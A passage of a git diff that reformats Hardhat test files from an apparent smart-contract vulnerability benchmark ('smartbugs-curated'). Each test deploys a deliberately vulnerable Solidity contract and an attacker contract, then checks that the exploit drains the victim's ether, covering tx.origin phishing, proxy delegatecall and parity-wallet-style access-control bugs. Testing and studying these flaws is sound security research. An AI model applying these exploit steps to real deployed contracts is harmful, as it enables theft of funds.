loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - - - const [sig] = await ethers.getSigners(); - const amount = ethers.parseEther("1.0"); - const transactionHash = await sig.sendTransaction({ - to: victim_addr, - value: amount, - }); - - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); - - - await expect(attacker.test()).to.be.reverted; - - await attacker.attack(); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - await expect(attacker.test()).to.not.be.reverted; - - const attackerBalanceAfter = await ethers.provider.getBalance(await attacker.getAddress()); - expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); - - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); + it("sanity check: access_control/incorrect_constructor_name2.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(owner.sendTransaction({ to: victim.target, value: 1 })).to.not + .be.reverted; + }); + + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + + const [sig] = await ethers.getSigners(); + const amount = ethers.parseEther("1.0"); + const transactionHash = await sig.sendTransaction({ + to: victim_addr, + value: amount, }); - }); \ No newline at end of file + + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); + + await expect(attacker.test()).to.be.reverted; + + await attacker.attack(); + + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + await expect(attacker.test()).to.not.be.reverted; + + const attackerBalanceAfter = await ethers.provider.getBalance( + await attacker.getAddress(), + ); + expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); + + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name3_test.js b/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name3_test.js index b23416b..5be6f4b 100644 --- a/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name3_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name3_test.js @@ -1,61 +1,66 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/incorrect_constructor_name3.sol', function () { +describe("attack access_control/incorrect_constructor_name3.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/incorrect_constructor_name3.sol/Missing.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - - const Missing = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Missing.connect(owner).deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); - - const MissingAttacker = await ethers.getContractFactory('contracts/access_control/incorrect_constructor_name3_attack.sol:MissingAttacker'); - const attacker = await MissingAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: access_control/incorrect_constructor_name3.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(owner.sendTransaction( - {to: victim.target, value: 1} - )).to.not.be.reverted; - }); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/incorrect_constructor_name3.sol/Missing.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + + const Missing = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Missing.connect(owner).deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); + + const MissingAttacker = await ethers.getContractFactory( + "contracts/access_control/incorrect_constructor_name3_attack.sol:MissingAttacker", + ); + const attacker = await MissingAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - - - const [sig] = await ethers.getSigners(); - const amount = ethers.parseEther("1.0"); - const transactionHash = await sig.sendTransaction({ - to: victim_addr, - value: amount, - }); - - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); - - - await expect(attacker.test()).to.be.reverted; - - await attacker.attack(); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - await expect(attacker.test()).to.not.be.reverted; - - const attackerBalanceAfter = await ethers.provider.getBalance(await attacker.getAddress()); - expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); - - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); + it("sanity check: access_control/incorrect_constructor_name3.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(owner.sendTransaction({ to: victim.target, value: 1 })).to.not + .be.reverted; + }); + + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + + const [sig] = await ethers.getSigners(); + const amount = ethers.parseEther("1.0"); + const transactionHash = await sig.sendTransaction({ + to: victim_addr, + value: amount, }); - }); \ No newline at end of file + + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); + + await expect(attacker.test()).to.be.reverted; + + await attacker.attack(); + + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + await expect(attacker.test()).to.not.be.reverted; + + const attackerBalanceAfter = await ethers.provider.getBalance( + await attacker.getAddress(), + ); + expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); + + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/mapping_write_test.js b/smartbugs-curated/0.4.x/test/access_control/mapping_write_test.js index 6605f7c..b39e4a9 100644 --- a/smartbugs-curated/0.4.x/test/access_control/mapping_write_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/mapping_write_test.js @@ -1,36 +1,39 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); +describe("attack access_control/mapping_write.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/mapping_write.sol/Map.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); -describe('attack access_control/mapping_write.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/mapping_write.sol/Map.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - - const Map = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Map.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); + const Map = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Map.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const MapAttacker = await ethers.getContractFactory('contracts/access_control/mapping_write_attack.sol:MapAttacker'); - const attacker = await MapAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const MapAttacker = await ethers.getContractFactory( + "contracts/access_control/mapping_write_attack.sol:MapAttacker", + ); + const attacker = await MapAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: access_control/mapping_write.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.set(1, 1)).to.not.be.reverted; - expect(await victim.get(1)).to.equal(1); - }); + it("sanity check: access_control/mapping_write.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.set(1, 1)).to.not.be.reverted; + expect(await victim.get(1)).to.equal(1); + }); - - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - await expect(attacker.withdraw_from_victim()).to.be.reverted; - await attacker.attack(attacker.getAddress()); - await attacker.withdraw_from_victim(); - }); - }); \ No newline at end of file + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + await expect(attacker.withdraw_from_victim()).to.be.reverted; + await attacker.attack(attacker.getAddress()); + await attacker.withdraw_from_victim(); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/multiowned_vulnerable_test.js b/smartbugs-curated/0.4.x/test/access_control/multiowned_vulnerable_test.js index 27092ce..53ca188 100644 --- a/smartbugs-curated/0.4.x/test/access_control/multiowned_vulnerable_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/multiowned_vulnerable_test.js @@ -1,52 +1,62 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/multiowned_vulnerable.sol', function () { - let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/multiowned_vulnerable.sol/TestContract.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const TestContract = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await TestContract.connect(owner).deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack access_control/multiowned_vulnerable.sol", function () { + let owner; + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/multiowned_vulnerable.sol/TestContract.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const TestContract = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await TestContract.connect(owner).deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const TestContractAttacker = await ethers.getContractFactory('contracts/access_control/multiowned_vulnerable_attack.sol:TestContractAttacker'); - const attacker = await TestContractAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const TestContractAttacker = await ethers.getContractFactory( + "contracts/access_control/multiowned_vulnerable_attack.sol:TestContractAttacker", + ); + const attacker = await TestContractAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: access_control/multiowned_vulnerable.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(owner).newOwner(owner.address)).to.not.be.reverted; - await expect(victim.connect(owner).withdrawAll()).to.not.be.reverted; - }); + it("sanity check: access_control/multiowned_vulnerable.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(owner).newOwner(owner.address)).to.not.be + .reverted; + await expect(victim.connect(owner).withdrawAll()).to.not.be.reverted; + }); - - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - const amount = ethers.parseEther("1.0"); - await owner.sendTransaction({ - to: victim_addr, - value: amount, - }); - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceBefore).to.equal(0); - await expect(attacker.test()).to.be.reverted; - - await attacker.attack(); - await expect(attacker.test()).to.not.be.reverted; - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceAfter).to.equal(amount); + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + const amount = ethers.parseEther("1.0"); + await owner.sendTransaction({ + to: victim_addr, + value: amount, }); - }); \ No newline at end of file + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceBefore).to.equal(0); + await expect(attacker.test()).to.be.reverted; + + await attacker.attack(); + await expect(attacker.test()).to.not.be.reverted; + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + const attackerBalanceAfter = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceAfter).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/mycontract_test.js b/smartbugs-curated/0.4.x/test/access_control/mycontract_test.js index bb9066f..d551933 100644 --- a/smartbugs-curated/0.4.x/test/access_control/mycontract_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/mycontract_test.js @@ -1,63 +1,78 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); -const { getContractAddress } = require('@ethersproject/address') +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); +const { getContractAddress } = require("@ethersproject/address"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/mycontract.sol', function () { +describe("attack access_control/mycontract.sol", function () { let victim_sig; let attacker_sig; let amount; - async function deployContracts() { - [victim_sig, attacker_sig] = await ethers.getSigners(); - const ownerNonce = await victim_sig.getNonce() + 1; - const futureAddress = getContractAddress({ - from: victim_sig.address, - nonce: ownerNonce - }); - - amount = ethers.parseEther("1.0"); - await victim_sig.sendTransaction({ - to: futureAddress, - value: amount, - }); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/mycontract.sol/MyContract.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const MyContract = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await MyContract.connect(victim_sig).deploy(); - await victim.waitForDeployment(); - const victim_addr = await victim.getAddress(); - - const MyContractAttacker = await ethers.getContractFactory('contracts/access_control/mycontract_attack.sol:MyContractAttacker'); - const attacker = await MyContractAttacker.deploy(victim_addr, attacker_sig.address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: access_control/mycontract.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(victim_sig).sendTo(victim_sig.address, 1)).to.not.be.reverted; + async function deployContracts() { + [victim_sig, attacker_sig] = await ethers.getSigners(); + const ownerNonce = (await victim_sig.getNonce()) + 1; + const futureAddress = getContractAddress({ + from: victim_sig.address, + nonce: ownerNonce, }); - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - - const receiverBalance = await ethers.provider.getBalance(victim_addr); - expect(receiverBalance).to.equal(ethers.parseEther("1.0")); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_sig.address); - const smallAmount = ethers.parseUnits("1", "wei"); - await victim_sig.sendTransaction({ - to: attacker_addr, - value: smallAmount - }); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_sig.address); - expect(attackerBalanceAfter - attackerBalanceBefore).to.not.equal(smallAmount); - expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); - - const receiverBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(receiverBalanceAfter).to.equal(0); + amount = ethers.parseEther("1.0"); + await victim_sig.sendTransaction({ + to: futureAddress, + value: amount, }); - }); \ No newline at end of file + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/mycontract.sol/MyContract.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const MyContract = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await MyContract.connect(victim_sig).deploy(); + await victim.waitForDeployment(); + const victim_addr = await victim.getAddress(); + + const MyContractAttacker = await ethers.getContractFactory( + "contracts/access_control/mycontract_attack.sol:MyContractAttacker", + ); + const attacker = await MyContractAttacker.deploy( + victim_addr, + attacker_sig.address, + ); + await attacker.waitForDeployment(); + return { victim, attacker }; + } + + it("sanity check: access_control/mycontract.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(victim_sig).sendTo(victim_sig.address, 1)).to + .not.be.reverted; + }); + + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + + const receiverBalance = await ethers.provider.getBalance(victim_addr); + expect(receiverBalance).to.equal(ethers.parseEther("1.0")); + + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker_sig.address, + ); + const smallAmount = ethers.parseUnits("1", "wei"); + await victim_sig.sendTransaction({ + to: attacker_addr, + value: smallAmount, + }); + const attackerBalanceAfter = await ethers.provider.getBalance( + attacker_sig.address, + ); + expect(attackerBalanceAfter - attackerBalanceBefore).to.not.equal( + smallAmount, + ); + expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); + + const receiverBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(receiverBalanceAfter).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/parity_wallet_bug_2_test.js b/smartbugs-curated/0.4.x/test/access_control/parity_wallet_bug_2_test.js index 689783e..fac4ce3 100644 --- a/smartbugs-curated/0.4.x/test/access_control/parity_wallet_bug_2_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/parity_wallet_bug_2_test.js @@ -1,51 +1,64 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/parity_wallet_bug_2.sol', function () { +describe("attack access_control/parity_wallet_bug_2.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/parity_wallet_bug_2.sol/WalletLibrary.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const WalletLibrary = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await WalletLibrary.connect(owner).deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); - - const WalletLibraryAttacker = await ethers.getContractFactory('contracts/access_control/parity_wallet_bug_2_attack.sol:WalletLibraryAttacker'); - const attacker = await WalletLibraryAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: access_control/parity_wallet_bug_2.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(owner).initWallet([owner.address], 1, 1)).to.not.be.reverted; - await expect(victim.connect(owner).kill(owner.address)).to.not.be.reverted; - }); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/parity_wallet_bug_2.sol/WalletLibrary.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const WalletLibrary = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await WalletLibrary.connect(owner).deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const amount = ethers.parseEther("1"); - const [signer] = await ethers.getSigners(); - await signer.sendTransaction({ - to: victim.target, - value: amount - }); + const WalletLibraryAttacker = await ethers.getContractFactory( + "contracts/access_control/parity_wallet_bug_2_attack.sol:WalletLibraryAttacker", + ); + const attacker = await WalletLibraryAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - const victimBalanceBefore = await ethers.provider.getBalance(victim.target); - expect(victimBalanceBefore).to.equal(amount); + it("sanity check: access_control/parity_wallet_bug_2.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(owner).initWallet([owner.address], 1, 1)).to.not + .be.reverted; + await expect(victim.connect(owner).kill(owner.address)).to.not.be.reverted; + }); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceBefore).to.equal(0); + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const amount = ethers.parseEther("1"); + const [signer] = await ethers.getSigners(); + await signer.sendTransaction({ + to: victim.target, + value: amount, + }); - await attacker.attack(); - const victimBalanceAfter = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfter).to.equal(0); + const victimBalanceBefore = await ethers.provider.getBalance(victim.target); + expect(victimBalanceBefore).to.equal(amount); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceAfter).to.equal(amount); - }); - }); \ No newline at end of file + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceBefore).to.equal(0); + + await attacker.attack(); + const victimBalanceAfter = await ethers.provider.getBalance(victim.target); + expect(victimBalanceAfter).to.equal(0); + + const attackerBalanceAfter = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceAfter).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/phishable_test.js b/smartbugs-curated/0.4.x/test/access_control/phishable_test.js index 1db23a6..292ed5d 100644 --- a/smartbugs-curated/0.4.x/test/access_control/phishable_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/phishable_test.js @@ -1,65 +1,76 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); -const { ethers } = require('hardhat'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); +const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/phishable.sol', function () { - let victim_sig; - let attacker_sig; - async function deployContracts() { +describe("attack access_control/phishable.sol", function () { + let victim_sig; + let attacker_sig; + async function deployContracts() { + const [v, a] = await ethers.getSigners(); + victim_sig = v; + attacker_sig = a; + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/phishable.sol/Phishable.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Phishable = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Phishable.deploy(victim_sig.address); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const [v, a] = await ethers.getSigners(); - victim_sig = v; - attacker_sig = a; - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/phishable.sol/Phishable.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Phishable = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Phishable.deploy(victim_sig.address); - await victim.waitForDeployment(); - const address = await victim.getAddress(); + const PhishableAttacker = await ethers.getContractFactory( + "contracts/access_control/phishable_attack.sol:PhishableAttacker", + ); + const attacker = await PhishableAttacker.deploy( + address, + attacker_sig.address, + ); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - const PhishableAttacker = await ethers.getContractFactory('contracts/access_control/phishable_attack.sol:PhishableAttacker'); - const attacker = await PhishableAttacker.deploy(address, attacker_sig.address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + it("sanity check: access_control/phishable.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(victim_sig).withdrawAll(victim_sig.address)).to + .not.be.reverted; + }); - it('sanity check: access_control/phishable.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(victim_sig).withdrawAll(victim_sig.address)).to.not.be.reverted; + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const amount = ethers.parseEther("1.0"); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + await victim_sig.sendTransaction({ + to: victim_addr, + value: amount, }); - - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const amount = ethers.parseEther("1.0"); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - await victim_sig.sendTransaction({ - to: victim_addr, - value: amount, - }); + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker_sig.address, + ); - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_sig.address); + expect(victimBalanceBefore).to.equal(amount); + const small_amount = ethers.parseUnits("1", "wei"); - expect(victimBalanceBefore).to.equal(amount); - - const small_amount = ethers.parseUnits("1", "wei"); - - await victim_sig.sendTransaction({ - to: attacker_addr, - value: small_amount, - }); - - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); + await victim_sig.sendTransaction({ + to: attacker_addr, + value: small_amount, + }); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_sig.address); - expect(attackerBalanceAfter - attackerBalanceBefore).to.not.equal(small_amount); - expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); - }); - }); \ No newline at end of file + const attackerBalanceAfter = await ethers.provider.getBalance( + attacker_sig.address, + ); + expect(attackerBalanceAfter - attackerBalanceBefore).to.not.equal( + small_amount, + ); + expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/proxy_test.js b/smartbugs-curated/0.4.x/test/access_control/proxy_test.js index 7dcb3d6..d8b5414 100644 --- a/smartbugs-curated/0.4.x/test/access_control/proxy_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/proxy_test.js @@ -1,64 +1,69 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); -const { getContractAddress } = require('@ethersproject/address') +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); +const { getContractAddress } = require("@ethersproject/address"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/proxy.sol', function () { - let victim_sig, attacker_sig, amount; - async function deployContracts() { - const [v, a] = await ethers.getSigners(); - victim_sig = v; - attacker_sig = a; - const victimNonce = await victim_sig.getNonce() + 1; - const futureAddress = getContractAddress({ - from: victim_sig.address, - nonce: victimNonce - }); +describe("attack access_control/proxy.sol", function () { + let victim_sig, attacker_sig, amount; + async function deployContracts() { + const [v, a] = await ethers.getSigners(); + victim_sig = v; + attacker_sig = a; + const victimNonce = (await victim_sig.getNonce()) + 1; + const futureAddress = getContractAddress({ + from: victim_sig.address, + nonce: victimNonce, + }); - amount = ethers.parseEther("1.0"); - await victim_sig.sendTransaction({ - to: futureAddress, - value: amount, - }); + amount = ethers.parseEther("1.0"); + await victim_sig.sendTransaction({ + to: futureAddress, + value: amount, + }); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/proxy.sol/Proxy.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Proxy = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Proxy.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/proxy.sol/Proxy.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Proxy = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Proxy.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const ProxyAttacker = await ethers.getContractFactory('contracts/access_control/proxy_attack.sol:ProxyAttacker'); - const attacker = await ProxyAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const ProxyAttacker = await ethers.getContractFactory( + "contracts/access_control/proxy_attack.sol:ProxyAttacker", + ); + const attacker = await ProxyAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: access_control/proxy.sol', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const attackerInterface = new ethers.Interface([ - "function benign()" - ]); + it("sanity check: access_control/proxy.sol", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const attackerInterface = new ethers.Interface(["function benign()"]); - const data = attackerInterface.encodeFunctionData("benign"); - await expect( victim.forward(attacker.target, data)).to.not.be.reverted; - }); + const data = attackerInterface.encodeFunctionData("benign"); + await expect(victim.forward(attacker.target, data)).to.not.be.reverted; + }); - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); - const victimeBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimeBalanceBefore).to.equal(amount); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceBefore).to.equal(0); + const victimeBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimeBalanceBefore).to.equal(amount); + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceBefore).to.equal(0); - await attacker.attack(); - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceAfter).to.equal(amount); - }); - }); \ No newline at end of file + await attacker.attack(); + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + const attackerBalanceAfter = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceAfter).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/simple_suicide_test.js b/smartbugs-curated/0.4.x/test/access_control/simple_suicide_test.js index 148d147..2f0ec93 100644 --- a/smartbugs-curated/0.4.x/test/access_control/simple_suicide_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/simple_suicide_test.js @@ -1,34 +1,47 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const 